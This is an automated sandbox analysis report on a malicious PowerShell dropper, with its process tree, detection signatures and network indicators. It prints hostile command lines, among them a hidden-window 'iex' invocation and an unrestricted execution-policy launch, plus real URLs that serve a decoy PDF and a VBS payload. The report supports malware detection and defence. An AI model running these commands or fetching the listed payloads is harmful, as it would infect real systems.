Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
8iAcoQLc3o.ps1

Overview

General Information

Sample name:8iAcoQLc3o.ps1
renamed because original name is a hash value
Original sample name:7ce5c4a2b61a6d000da4ca3d4e5869a55349d9a03af50d7560b5485fe6e86935.ps1
Analysis ID:1578224
MD5:2bd577dc4641703c479a1482dacd6358
SHA1:fc7e7f29396675e92bb998621fa2f6b706b16617
SHA256:7ce5c4a2b61a6d000da4ca3d4e5869a55349d9a03af50d7560b5485fe6e86935
Tags:185-236-228-9287-120-112-91ps1www-al-rasikh-comuser-JAMESWT_MHT
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
AI detected suspicious sample
Loading BitLocker PowerShell Module
Powershell creates an autostart link
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 7804 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\8iAcoQLc3o.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8072 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\hqpoqw.vbs'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • Acrobat.exe (PID: 4092 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      • AcroCEF.exe (PID: 7348 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • AcroCEF.exe (PID: 8100 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2128 --field-trial-handle=1660,i,3372118493204985000,18369712110352765169,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • svchost.exe (PID: 7832 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7804JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

    Other

    SourceRuleDescriptionAuthorStrings
    amsi64_7804.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Suspicious PowerShell Parameter Substring
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\hqpoqw.vbs'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\hqpoqw.vbs'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\8iAcoQLc3o.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7804, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\hqpoqw.vbs'", ProcessId: 8072, ProcessName: powershell.exe
      Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
      Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7804, TargetFilename: C:\Users\Public\dmb.vbs
      Sigma detected: Change PowerShell Policies to an Insecure Level
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\8iAcoQLc3o.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\8iAcoQLc3o.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\8iAcoQLc3o.ps1", ProcessId: 7804, ProcessName: powershell.exe
      Sigma detected: Potential Binary Or Script Dropper Via PowerShell
      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7804, TargetFilename: C:\Users\Public\dmb.vbs
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\8iAcoQLc3o.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\8iAcoQLc3o.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\8iAcoQLc3o.ps1", ProcessId: 7804, ProcessName: powershell.exe
      Sigma detected: Windows Processes Suspicious Parent Directory
      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7832, ProcessName: svchost.exe

      Suricata Signatures

      No Suricata rule has matched

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: 8iAcoQLc3o.ps1Avira: detected
      Multi AV Scanner detection for submitted file
      Source: 8iAcoQLc3o.ps1Virustotal: Detection: 42%Perma Link
      Source: 8iAcoQLc3o.ps1ReversingLabs: Detection: 36%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 94.1% probability
      Source: unknownHTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.10:49718 version: TLS 1.2
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1357601906.0000021EF0D73000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000005.00000002.1590508240.0000028A66A1B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.1505487937.0000028A4E5B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1497120784.0000028A4C5DD000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb% source: powershell.exe, 00000005.00000002.1590508240.0000028A66A1B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.1590508240.0000028A669F1000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: b.pdb_ source: powershell.exe, 00000005.00000002.1505487937.0000028A4E5FF000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdbgement.Automation.pdb source: powershell.exe, 00000005.00000002.1497120784.0000028A4C5DD000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: gement.Automation.pdbystem.C" source: powershell.exe, 00000008.00000002.1329928980.0000021ED6963000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1353972064.0000021EF09D5000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1353620639.0000021EF099B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbIJ source: powershell.exe, 00000005.00000002.1511182185.0000028A4E697000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: .pdb` source: powershell.exe, 00000008.00000002.1356025565.0000021EF0C66000.00000004.00000020.00020000.00000000.sdmp
      Source: global trafficHTTP traffic detected: GET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.astenterprises.com.pkConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /ms/ms.vbs HTTP/1.1Host: www.bluemaxxlaser.comConnection: Keep-Alive
      Source: Joe Sandbox ViewIP Address: 203.175.174.69 203.175.174.69
      Source: Joe Sandbox ViewIP Address: 107.161.23.150 107.161.23.150
      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.astenterprises.com.pkConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /ms/ms.vbs HTTP/1.1Host: www.bluemaxxlaser.comConnection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: www.astenterprises.com.pk
      Source: global trafficDNS traffic detected: DNS query: www.bluemaxxlaser.com
      Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Dec 2024 11:45:15 GMTServer: ApacheContent-Length: 315Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: powershell.exe, 00000005.00000002.1512088462.0000028A503FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://astenterprises.com.pk
      Source: powershell.exe, 00000005.00000002.1502142325.0000028A4C845000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftA
      Source: svchost.exe, 0000000C.00000002.2518391003.00000250DD08D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
      Source: 77EC63BDA74BD0D0E0426DC8F80085060.11.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
      Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
      Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
      Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
      Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
      Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
      Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
      Source: edb.log.12.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
      Source: powershell.exe, 00000008.00000002.1330629273.0000021ED926A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
      Source: powershell.exe, 00000005.00000002.1578438045.0000028A5EAB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1578438045.0000028A5E975000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1349794535.0000021EE88A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000008.00000002.1330629273.0000021ED8A58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000008.00000002.1330629273.0000021ED8A58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: powershell.exe, 00000005.00000002.1512088462.0000028A4E901000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1330629273.0000021ED8831000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000008.00000002.1330629273.0000021ED8A58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: powershell.exe, 00000008.00000002.1330629273.0000021ED8A58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000005.00000002.1512088462.0000028A503FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.astenterprises.com.pk
      Source: powershell.exe, 00000005.00000002.1512088462.0000028A4EB32000.00000004.00000800.00020000.00000000.sdmp, 8iAcoQLc3o.ps1String found in binary or memory: http://www.blud1dmaxxlasd1dr.com/ms/ms.vbs
      Source: powershell.exe, 00000005.00000002.1512088462.0000028A50491000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1512088462.0000028A50435000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.bluemaxxlaser.com
      Source: powershell.exe, 00000005.00000002.1512088462.0000028A50435000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.bluemaxxlaser.com/ms/ms.vbs
      Source: powershell.exe, 00000005.00000002.1511872796.0000028A4E790000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
      Source: 2D85F72862B55C4EADD9E66E06947F3D0.11.drString found in binary or memory: http://x1.i.lencr.org/
      Source: powershell.exe, 00000005.00000002.1512088462.0000028A4E901000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1330629273.0000021ED8831000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000008.00000002.1330629273.0000021ED8A58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
      Source: powershell.exe, 00000008.00000002.1330629273.0000021ED9E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
      Source: powershell.exe, 00000008.00000002.1349794535.0000021EE88A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000008.00000002.1349794535.0000021EE88A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000008.00000002.1349794535.0000021EE88A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: edb.log.12.drString found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
      Source: svchost.exe, 0000000C.00000003.1423876547.00000250DCE00000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.12.dr, edb.log.12.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
      Source: powershell.exe, 00000008.00000002.1330629273.0000021ED8A58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000005.00000002.1512088462.0000028A4F532000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1330629273.0000021ED926A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1330629273.0000021ED9E56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: powershell.exe, 00000005.00000002.1578438045.0000028A5EAB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1578438045.0000028A5E975000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1349794535.0000021EE88A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: ReaderMessages.10.drString found in binary or memory: https://www.adobe.co
      Source: powershell.exe, 00000005.00000002.1512088462.0000028A4FF32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astd1dntd1drprisd1ds.com.pk/ms/List%20of%20rd1dquird1dd%20itd1dms%20and%20sd1drvicd1ds.p
      Source: powershell.exe, 00000005.00000002.1512088462.0000028A503F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk
      Source: powershell.exe, 00000005.00000002.1512088462.0000028A503F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk/ms/List
      Source: powershell.exe, 00000005.00000002.1512088462.0000028A4FF32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1512088462.0000028A503F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
      Source: unknownHTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.10:49718 version: TLS 1.2
      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
      Source: classification engineClassification label: mal84.evad.winPS1@21/61@3/3
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Desktop\List of Required items and services.pdfJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7816:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dluyv2wx.teb.ps1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\hqpoqw.vbs'"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: 8iAcoQLc3o.ps1Virustotal: Detection: 42%
      Source: 8iAcoQLc3o.ps1ReversingLabs: Detection: 36%
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\8iAcoQLc3o.ps1"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\hqpoqw.vbs'"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2128 --field-trial-handle=1660,i,3372118493204985000,18369712110352765169,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\hqpoqw.vbs'"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"Jump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2128 --field-trial-handle=1660,i,3372118493204985000,18369712110352765169,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
